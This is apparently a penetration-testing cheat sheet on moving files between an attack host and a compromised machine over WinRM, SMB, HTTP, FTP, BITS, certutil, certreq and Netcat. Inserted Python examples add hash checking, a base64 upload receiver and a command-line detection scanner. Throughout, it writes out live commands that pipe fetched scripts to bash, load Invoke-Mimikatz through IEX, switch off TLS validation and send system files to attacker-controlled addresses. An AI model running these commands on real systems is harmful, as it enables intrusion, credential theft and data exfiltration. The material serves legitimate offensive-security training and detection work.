It is crucial to know several methods for transferring files between devices, whether they run the same or different operating systems.
Winrm: Tool Evil-winrm
WinRM (Windows Remote Management) is a remote management protocol in the Windows operating system that allows administrators to remotely execute commands and manage Windows-based systems. It enables secure communication and automation between Windows machines, making it a valuable tool for remote administration and configuration tasks.
Command to connect:
evil-winrm -i <IP> -u <user> -p <password>
Upload a file (from the Evil-WinRM prompt):
upload <pathLocalFile> <pathRemoteFile>
Download a file:
download <pathRemoteFile> <pathLocalFile>
SCP (Windows)
Syntax:
scp [options] [source] [destination]
scp <LOCAL-FILE> <REMOTE-USERNAME>@<REMOTE-SERVER-NAME>:/pathRemote
For example, to copy a file named "example.txt" from the local machine to a remote server with the IP address "remote-server" and store it in the "/home/user/" directory, the command would be:
scp example.txt user@remote-server:/home/user/
Start a Python HTTP server
Run on the attack machine:
python3 -m http.server <port>
To download a file from the attack machine to the victim machine with wget:
wget http://<IP-attack>:<port-attack>/<file.txt>
With curl:
curl -o </tmp/outputFile.txt> http://<IP-attack>:<port-attack>/<file.txt>
With PowerShell:
Invoke-WebRequest -Uri "<pathAttacker>" -OutFile "<pathVictim>"
Download files with SMB
We need to create an SMB server on the attack machine with smbserver.py from Impacket and then use copy, move, PowerShell Copy-Item, or any other tool that can connect to an SMB share.
Create an SMB Server
Example:
sudo impacket-smbserver share -smb2support <pathSMBshare>
Create the SMB server with a username and password
Example:
sudo impacket-smbserver share -smb2support <pathSMBshare> -user <user> -password <password>
Mount the SMB share with the username and password
Example:
net use n: \\<IP-attack>\share /user:<user> <password>
and then copy a file:
copy n:\<file>
Copy a file from the SMB server
To download a file from the SMB share to the current working directory:
copy \\<IP-attack>\share\<file>
The same syntax copies in the other direction, from the host to a share; this example sends a local file to a WebDAV share addressed through the DavWWWRoot redirector path:
copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\
Download files with Python2 and Python3
Example with Python2:
python2.7 -c 'import urllib;urllib.urlretrieve("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'
Example with Python3:
python3 -c 'import urllib.request;urllib.request.urlretrieve("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'
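The one-liners above (and the `python3 -m http.server` section earlier) write whatever the server returns straight to disk. As an added example, not code from the original page, the Python script below performs the same download with urllib against a local copy of `python3 -m http.server` started in a thread, and adds the check a practitioner wants before executing a fetched script: it compares the file's SHA-256 with a hash obtained out of band and deletes the file on mismatch. The served script, its hash and the loopback port are all constructed for the example.

```python
import functools
import hashlib
import hmac
import http.server
import os
import tempfile
import threading
import urllib.request

# Constructed stand-in for a script such as LinEnum.sh.
SAMPLE_SCRIPT = b"#!/bin/sh\necho 'constructed sample script'\n"


class _QuietHandler(http.server.SimpleHTTPRequestHandler):
    """What `python3 -m http.server` runs, minus the access log lines."""

    def log_message(self, fmt, *args):
        pass


def serve_directory(directory):
    """Serve `directory` on a loopback port chosen by the OS, in a background
    thread.  Returns (server, port); call server.shutdown() when finished."""
    handler = functools.partial(_QuietHandler, directory=directory)
    server = http.server.ThreadingHTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def sha256_of(path):
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def download_and_verify(url, dest, expected_sha256):
    """Fetch `url` into `dest` (what urlretrieve does), then keep the file only
    if its SHA-256 equals a hash obtained out of band, e.g. from the project's
    release notes.  Returns True if the file was kept, False if it was removed.
    Nothing is executed before the comparison."""
    # ProxyHandler({}) ignores http_proxy-style environment variables, which
    # would otherwise break the loopback fetch in the demo.
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    with opener.open(url) as resp, open(dest, "wb") as out:
        for chunk in iter(lambda: resp.read(1 << 16), b""):
            out.write(chunk)
    if not hmac.compare_digest(sha256_of(dest), expected_sha256.lower()):
        os.remove(dest)  # never leave an unverified artifact on disk
        return False
    return True


def demo():
    """End-to-end run on loopback: publish SAMPLE_SCRIPT, fetch it with the
    right hash and then with a wrong one, and report what happened."""
    workdir = tempfile.mkdtemp()
    with open(os.path.join(workdir, "tool.sh"), "wb") as f:
        f.write(SAMPLE_SCRIPT)
    server, port = serve_directory(workdir)
    url = f"http://127.0.0.1:{port}/tool.sh"
    dest = os.path.join(workdir, "downloaded.sh")
    try:
        good = download_and_verify(url, dest, hashlib.sha256(SAMPLE_SCRIPT).hexdigest())
        with open(dest, "rb") as f:
            content = f.read()
        bad = download_and_verify(url, dest, "00" * 32)  # deliberately wrong hash
        left_behind = os.path.exists(dest)
    finally:
        server.shutdown()
        server.server_close()
    return {"good": good, "content": content, "bad": bad, "left_behind": left_behind}


if __name__ == "__main__":
    print(demo())
```

The comparison uses hmac.compare_digest rather than `==` out of habit for anything that compares digests, and the file is removed on mismatch so a later `bash downloaded.sh` cannot pick up an unverified copy.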
Download Files with PHP
Let's see some examples of downloading files using PHP.
Download content with PHP
Example with file_get_contents():
php -r '$file = file_get_contents("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'
Example with fopen():
php -r 'const BUFFER = 1024; $fremote = fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'
Example - PHP download a file and pipe it to bash:
php -r '$lines = @file("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash
Download Files with other Programming Languages
Ruby
Download a file:
ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))'
Perl
Download a file:
perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh");'
JavaScript
Download a file with a Windows Script Host downloader script (wget.js must already be present on the host):
cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1
Download Files with PowerShell
File download with the DownloadFile method
Syntax:
(New-Object Net.WebClient).DownloadFile('<TargetFileURL>','<OutputFileName>')
Another method is DownloadFileAsync:
(New-Object Net.WebClient).DownloadFileAsync('<TargetFileURL>','<OutputFileName>')
Example to download PowerView:
(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1','C:\Users\Public\Downloads\PowerView.ps1')
File download with the DownloadString method
DownloadString returns the content as a string without writing it to disk; passing it to IEX (Invoke-Expression) runs it. Example downloading Mimikatz, with both argument orders being equivalent:
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')
(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1') | IEX
Invoke-WebRequest method:
Example downloading PowerView:
Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1
Common Errors with PowerShell:
A common error in PowerShell downloads concerns the SSL/TLS secure channel when the server certificate is not trusted. It can be bypassed by disabling certificate validation for the session; note that this also removes the protection TLS gives against the download being tampered with in transit.
Example downloading PSUpload (the validation callback is set first, then the download is run):
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Example to upload a file with the Invoke-FileUpload function that PSUpload.ps1 provides:
Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts
PowerShell Base64 Web Upload:
Another way to use PowerShell and base64-encoded files for upload operations is Invoke-WebRequest or Invoke-RestMethod together with Netcat. We use Netcat to listen on a port we specify and send the file as the body of a POST request. Finally, we copy the base64 string out of the Netcat output and decode it back into a file.
Example:
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64
We catch the base64 data with Netcat and use the base64 command with the decode option to turn the string back into the file:
nc -lvnp 8000
echo <base64> | base64 -d > hosts
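The Netcat receiver above leaves the decode step to copy-and-paste by hand. As an added example that is not part of the original page, the Python receiver below accepts the same POST body the two PowerShell lines send, rejects anything that is not valid base64 with a 400, and writes the decoded bytes under a server-chosen file name; a client function mirrors the PowerShell side so the exchange can be run end to end on loopback. The sample hosts content and the 127.0.0.1 listener are constructed for the example.

```python
import base64
import binascii
import http.server
import os
import tempfile
import threading
import urllib.error
import urllib.request
import uuid

# Constructed file content standing in for C:\Windows\System32\drivers\etc\hosts.
SAMPLE_HOSTS = b"127.0.0.1 localhost\n10.0.0.7 fileserver.example.internal\n"


class Base64UploadHandler(http.server.BaseHTTPRequestHandler):
    """Receives the body of `Invoke-WebRequest -Method POST -Body $b64`,
    decodes it and stores the result under a name the server chooses."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length") or 0)
        body = self.rfile.read(length)
        try:
            # validate=True turns stray bytes into an error instead of silently
            # dropping them, so a mangled upload is rejected, not written out.
            data = base64.b64decode(body, validate=True)
        except binascii.Error:
            self.send_error(400, "body is not valid base64")
            return
        # The client never supplies the file name, which keeps path tricks
        # out of the output directory.
        name = f"upload-{uuid.uuid4().hex}.bin"
        with open(os.path.join(self.server.outdir, name), "wb") as f:
            f.write(data)
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(name.encode())

    def log_message(self, fmt, *args):
        pass  # keep the demo output quiet


class UploadServer(http.server.ThreadingHTTPServer):
    def __init__(self, outdir, bind=("127.0.0.1", 0)):
        super().__init__(bind, Base64UploadHandler)
        self.outdir = outdir


def start_receiver(outdir):
    """Start the receiver in a background thread; returns (server, port)."""
    server = UploadServer(outdir)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def _opener():
    # Ignore proxy environment variables so the loopback request goes direct.
    return urllib.request.build_opener(urllib.request.ProxyHandler({}))


def upload_file_b64(url, path):
    """Client side, equivalent to the two PowerShell lines: base64 the file
    and POST the string.  Returns the name the server stored it under."""
    with open(path, "rb") as f:
        body = base64.b64encode(f.read())
    req = urllib.request.Request(url, data=body, method="POST")
    with _opener().open(req) as resp:
        return resp.read().decode()


def demo():
    """Run the exchange on loopback and also confirm a non-base64 body is refused."""
    workdir = tempfile.mkdtemp()
    src = os.path.join(workdir, "hosts")
    with open(src, "wb") as f:
        f.write(SAMPLE_HOSTS)
    server, port = start_receiver(workdir)
    url = f"http://127.0.0.1:{port}/"
    try:
        saved = upload_file_b64(url, src)
        with open(os.path.join(workdir, saved), "rb") as f:
            received = f.read()
        try:
            _opener().open(urllib.request.Request(url, data=b"not base64!", method="POST"))
            rejected = False
        except urllib.error.HTTPError as e:
            rejected = e.code == 400
    finally:
        server.shutdown()
        server.server_close()
    return {"received": received, "rejected": rejected}


if __name__ == "__main__":
    print(demo())
```

Binding to 127.0.0.1 with port 0 is only for the self-contained run; a real receiver binds the interface the client can reach. The server, not the client, names the stored file, and an invalid body produces a 400 rather than a corrupted file on disk.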
Curl
A file can be uploaded to a WebDAV-enabled server using the PUT method with curl:
curl -T '<file.txt>' 'http://<IP>'
And renamed (for example to an executable extension) using the WebDAV MOVE method with curl:
curl -X MOVE --header 'Destination:http://<IP>/<newName>' 'http://<IP>/<oldName>'
Netcat
Attack host - listening on a port and sending the file to the compromised machine
Example:
nc -l -p <port> -q 0 < <fileToTransfer.exe>
Compromised machine - connecting to the listener with ncat to receive the file
Example:
ncat <IP-attack> <port> --recv-only > <fileToTransfer.exe>
Share Folder with RDP
Mounting a Linux folder
Example with rdesktop:
rdesktop <IP> -d <domain> -u <user> -p '<password>' -r disk:linux='<pathFolder>'
Example with xfreerdp:
xfreerdp /v:<IP> /d:<domain> /u:<user> /p:'<password>' /drive:<nameFolder>,<pathFolder>
WinSCP
It is a graphical SFTP client for Windows that uses SSH. I used it to connect over SSH and download files to Windows from the remote SSH host.
PuTTY
Connect from Windows to a remote SSH server.
SSH Downloads
Enabling the SSH server:
sudo systemctl enable ssh
Starting the SSH server:
sudo systemctl start ssh
Checking that SSH is listening:
netstat -lnpt
Now we can begin transferring files, for example with SCP:
scp plaintext@192.168.49.128:/root/myroot.txt .
Download Files with FTP
Another way to transfer files is FTP (File Transfer Protocol), which uses TCP ports 21 and 20. We can use the FTP client or PowerShell's Net.WebClient to download files from an FTP server.
Installing the FTP Server Python3 Module - pyftpdlib
We can configure an FTP server on our attack host using the Python3 pyftpdlib module. It can be installed with the following command:
sudo pip3 install pyftpdlib
Setting up a Python3 FTP Server
We specify port 21 because pyftpdlib uses port 2121 by default. Anonymous authentication is enabled by default if we don't set a user and password.
sudo python3 -m pyftpdlib --port 21
Transferring Files from an FTP Server Using PowerShell
After the FTP server is set up, we can perform file transfers using the FTP client pre-installed on Windows or PowerShell's Net.WebClient:
(New-Object Net.WebClient).DownloadFile('ftp://<IP>/<file>', '<newNameFile>')
When we get a shell on a remote machine, it may not be interactive. In that case we can create an FTP command file: first write the commands we want to execute to a file, then pass that file to the FTP client to download the target file.
Create a Command File for the FTP Client and Download the Target File
Example:
echo open <IP> > ftpcommand.txt
echo USER <user> >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo GET <file.txt> >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt
The client echoes the commands from the file as it runs them:
open <IP>
USER <user>
GET <file.txt>
bye
Then check the downloaded file:
more <file.txt>
FTP Uploads
Uploading files using FTP is very similar to downloading them. We can use PowerShell or the FTP client to complete the operation. Before we start our FTP server with the Python module pyftpdlib, we need to specify the option --write to allow clients to upload files to our attack host.
sudo python3 -m pyftpdlib --port 21 --write
Now let's use the PowerShell upload function to upload a file to our FTP server.
PowerShell Upload File:
(New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')
Example - Create a Command File for the FTP Client to Upload a File:
echo open 192.168.49.128 > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt
The client echoes the commands as it runs them:
open 192.168.49.128
USER anonymous
PUT c:\windows\system32\drivers\etc\hosts
bye
Execute Files without downloading
Example running LinEnum with bash without writing it to disk:
curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash
Example running a script with Python:
wget -qO- https://raw.githubusercontent.com/master/Scripts/helloworld.py | python3
Certutil
Casey Smith found that Certutil can be used to download arbitrary files. It is available in all Windows versions and has been a popular file transfer technique, serving as a de facto wget for Windows. However, the Antimalware Scan Interface (AMSI) currently detects this as malicious Certutil usage.
Download a file with Certutil
Example:
certutil.exe -verifyctl -split -f http://<IP-attack>/<file>
Bitsadmin
The Background Intelligent Transfer Service (BITS) can be used to download files from HTTP sites and SMB shares.
Syntax:
bitsadmin /transfer n http://<IP-attack>:<port-attack>/<file> <pathDestination>
Example download with PowerShell:
Import-Module bitstransfer; Start-BitsTransfer -Source "http://10.10.10.32/nc.exe" -Destination "C:\Temp\nc.exe"
Example upload with PowerShell:
Start-BitsTransfer "C:\Temp\bloodhound.zip" -Destination "http://10.10.10.132/uploads/bloodhound.zip" -TransferType Upload -ProxyUsage Override -ProxyList PROXY01:8080 -ProxyCredential INLANEFREIGHT\svc-sql
For example, to create a new BITS job named "MyJob" to download a file from a remote URL, you can use the following command:
bitsadmin /create /download MyJob http://example.com/file.txt C:\destination\file.txt
This will create a BITS job named "MyJob" to download the file from "http://example.com/file.txt" and save it to "C:\destination\file.txt".
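Certutil, bitsadmin and the WebClient/IEX cradles above, together with the certreq upload in the next section, all leave their tell-tale arguments in the process command line, which is where a defender catches them (Sysmon event 1, or Windows 4688 with command-line auditing enabled). As an added example, not code from the original page, the Python script below runs a small rule set over constructed process-creation command lines (the 10.0.0.5 address and the file names are invented) and reports which rule fired on which line, while leaving the benign certutil, bitsadmin and PowerShell lines unflagged. The rule names are this example's own.

```python
import re

# Each rule is (name, compiled regex), matched against the command-line field
# of a process-creation event.
RULES = [
    ("certutil_download",
     re.compile(r"certutil(\.exe)?\b.*-(urlcache|verifyctl)\b.*https?://", re.I)),
    ("bitsadmin_transfer",
     re.compile(r"bitsadmin(\.exe)?\b.*/(transfer|create)\b.*https?://", re.I)),
    ("start_bitstransfer",
     re.compile(r"Start-BitsTransfer\b.*https?://", re.I)),
    ("webclient_download",
     re.compile(r"Net\.WebClient\)?\.Download(String|File|FileAsync)\(", re.I)),
    # DownloadString fed to IEX in either order: "IEX (...)" or "(...) | IEX".
    ("download_cradle",
     re.compile(r"(?=.*\b(IEX|Invoke-Expression)\b)(?=.*DownloadString)", re.I)),
    ("invoke_webrequest_outfile",
     re.compile(r"Invoke-WebRequest\b.*-OutFile\b", re.I)),
    # Certificate validation switched off for the whole process.
    ("tls_validation_disabled",
     re.compile(r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I)),
    ("certreq_post",
     re.compile(r"certreq(\.exe)?\b.*-Post\b.*https?://", re.I)),
]


def scan_log(lines):
    """Return (rule_name, line) for every rule that fires on every line.
    One line may trigger several rules; that is useful signal, not noise."""
    hits = []
    for line in lines:
        for name, rx in RULES:
            if rx.search(line):
                hits.append((name, line))
    return hits


def summarize(hits):
    """Group hits by rule so the result reads like an alert summary."""
    by_rule = {}
    for name, line in hits:
        by_rule.setdefault(name, []).append(line)
    return by_rule


# Constructed sample: command-line fields of a few process-creation events.
SAMPLE_LOG = [
    r"certutil.exe -verifyctl -split -f http://10.0.0.5/tool.exe",
    r"certutil.exe -hashfile C:\Temp\installer.msi SHA256",                   # benign use
    r"bitsadmin /transfer n http://10.0.0.5:8000/nc.exe C:\Temp\nc.exe",
    r"bitsadmin /list /allusers",                                              # benign use
    r"powershell.exe -c IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')",
    r"powershell.exe -c Invoke-WebRequest http://10.0.0.5/PowerView.ps1 -OutFile PowerView.ps1",
    r"powershell.exe -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}",
    r"powershell.exe -c Get-Process | Sort-Object CPU",                        # benign use
    r"certreq.exe -Post -config http://10.0.0.5/ C:\Users\Public\report.txt",
]


if __name__ == "__main__":
    for rule, lines in summarize(scan_log(SAMPLE_LOG)).items():
        print(f"[{rule}]")
        for line in lines:
            print("   ", line)
```

The rules key on the argument combinations the page itself shows (a download switch plus a URL, or a cradle plus IEX) rather than on the binary name alone, which is what keeps `certutil -hashfile` and `bitsadmin /list` from alerting. Rule `tls_validation_disabled` exists because switching validation off is a reliable precursor to the insecure fetch that follows it.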
CertReq
CertReq.exe is a Windows certificate request tool that can also be used to POST a file to a web server.
We need to listen on a port on our attack host for incoming traffic using Netcat and then run certreq.exe to upload a file.
Example - upload a file:
certreq.exe -Post -config http://<IP-attack>:<port>/ c:\<fileToUpload>
The file contents arrive in our Netcat session, which must be started first:
sudo nc -lvnp <port>
Meterpreter Session (Metasploit)
Command to download a file:
download <file>
Command to upload a file:
upload <file>